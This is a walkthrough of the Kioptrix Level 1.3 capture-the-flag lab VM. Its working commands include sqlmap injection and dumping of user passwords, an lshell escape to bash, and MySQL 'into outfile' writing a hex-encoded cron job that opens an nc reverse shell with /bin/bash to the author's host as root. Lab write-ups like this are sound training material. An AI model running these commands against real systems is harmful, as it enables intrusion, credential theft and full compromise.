published on in writeup
tags: kioptrix

Kioptrix Level 1.3

This is a walkthrough of how I completed the Kioptrix Level 1.3 challenge. The goal is to find the flag.

Nmap

[email protected]:~# nmap -n -sV -A -p- 192.168.1.124

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2014-04-24T14:40:46-04:00
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

LigGoat Login

I visited the web page takes you to a LigGoat login page.

I first tried admin:admin, which redirected me to checklogin.php and the error message “Wrong Username or Password”. I attempted to use some SQLi to bypass this page. When I entered admin:' or '1'='1'-- I recieved the error message “Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/checklogin.php on line 28”.

This suggests that the password field is vulnerable, so to do the heavy lifting, I used sqlmap.

SQLMap

[email protected]:~# sqlmap -u http://192.168.1.124/checklogin.php --data="myusername=admin&mypassword=1" -p mypassword

This first attempt reported that the mypassword field was not vulnerable to SQLi, so I dialed up the level and risk.

[email protected]:~# sqlmap -u http://192.168.1.124/checklogin.php --data="myusername=admin&mypassword=1" -p mypassword --level=5 --risk=3
POST parameter 'mypassword' seems to be 'OR boolean-based blind - WHERE or HAVING clause' injectable 
POST parameter 'mypassword' seems to be 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable
[email protected]:~# sqlmap -u http://192.168.1.124/checklogin.php --data="myusername=admin&mypassword=1" --current-db --current-user --is-dba
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
current user:    [email protected]'
current database:    'members'
current user is DBA:    True
[email protected]:~# sqlmap -u http://192.168.1.124/checklogin.php --data="myusername=admin&mypassword=1" --dbs
[*] information_schema
[*] members
[*] mysql
[email protected]:~# sqlmap -u http://192.168.1.124/checklogin.php --data="myusername=admin&mypassword=1" -D members --tables
[email protected]:~# sqlmap -u http://192.168.1.124/checklogin.php --data="myusername=admin&mypassword=1" -D members -T members --dump
1  john  MyNameIsJohn   
2  robert  ADGAdsafdfwt4gadfga==
[email protected]:~# sqlmap -u http://192.168.1.124/checklogin.php --data="myusername=admin&mypassword=1" -D mysql -T user --dump
(root passwords blank)

A few interesting bits of information there…

SSH

In the previous challenge, information I obtained from a database allowed me to SSH into the system - so I tried this again with john and robert. I was able to login with both usernames and passwords, but each user was dropped into a limited shell of some description.

[email protected]:~# ssh john @ 192.168.1.124
john @ 192.168.1.124's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ help
cd  clear  echo  exit  help  ll  lpath  ls

You can only run the commands as shown above, too many attempts to run unauthorised commands kicks you out (how rude). I wondered if you could get further help on individual commands by typing help command.

john:~$ help help
Limited Shell (lshell) limited help.
Cheers.

That was a stroke of luck. I went off to do a bit of research regarding lshell, and found that it may be vulnerable to path restriction bypass which would allow me to run commands outside those which it specifies. The vulnerability is based around failure of user input whilst checking restricted paths. I tried to leverage this to run a new bash shell.

john:~$ echo __import__('os').system("/bin/bash")
[email protected]:~$

Another stroke of luck!

MySQL

I first made sure I could connect to MySQL as root, without a password.

[email protected]:~$ mysql -h localhost -u root -e "show databases;"
+--------------------+
| Database           |
+--------------------+
| information_schema | 
| members            | 
| mysql              | 
+--------------------+

Next I wanted to see if I could use MySQL to write to the file system, so I carried out a simple test.

[email protected]:~$ mysql -h localhost -u root -e "use mysql; select 0x7468697320697320612074657374 into outfile '/test';"

[email protected]:~$ cat /test
this is a test

[email protected]:~$ ls -l /test
-rw-rw-rw- 1 root root 15 2014-04-25 05:22 /test

This shows that I can write to the filesystem, but more importantly, as the root user.

Cron

I thought I could then use this to write a new job into cron, to automate a netcat connection to my IP. Since I can write as root, I can ensure the resulting shell is run with root privileges.

First check where netcat is:

[email protected]:~$ whereis nc
nc: /bin/nc.traditional

Then write the file:

[email protected]:~$ mysql -h localhost -u root -e "use mysql; select 0x2a202a202a202a202a20726f6f74202f62696e2f6e632e747261646974696f6e616c203139322e3136382e312e31323020343433202d65202f62696e2f62617368 into outfile '/etc/cron.d/totally-legitimate-cron';"

Set up my listener, and…

[email protected]:~# nc -lnvp 443
nc: listening on :: 443 ...
nc: listening on 0.0.0.0 443 ...
nc: connect to 192.168.1.120 443 from 192.168.1.124 58497

id
uid=0(root) gid=0(root) groups=0(root)

cat congrats.txt
Congratulations!
You've got root.

Epilogue

Getting the cron to work took a good amount of time - I thought I was getting the syntax incorrect. I checked the running processes and saw more than a few instances of netcat running, but the connections weren’t reaching me.

Changing the port to 443 fixed this and I got a connection.

In my root shell I checked the iptables, and there was a cheeky rule in there to block traffic on port 4444 (as well as a few others).

/sbin/iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
DROP       tcp  --  anywhere             anywhere            tcp dpt:4444 
DROP       tcp  --  anywhere             anywhere            tcp dpts:1337:x11 
DROP       tcp  --  anywhere             anywhere            tcp dpts:webmin:31337 
DROP       tcp  --  anywhere             anywhere            tcp dpt:webcache 
Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         
Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
DROP       tcp  --  anywhere             anywhere            tcp dpt:4444 
DROP       tcp  --  anywhere             anywhere            tcp dpts:1337:x11 
DROP       tcp  --  anywhere             anywhere            tcp dpts:webmin:31337 
DROP       tcp  --  anywhere             anywhere            tcp dpt:webcache 
DROP       tcp  --  anywhere             anywhere            tcp dpt:www 
DROP       tcp  --  anywhere             anywhere            tcp dpt:ftp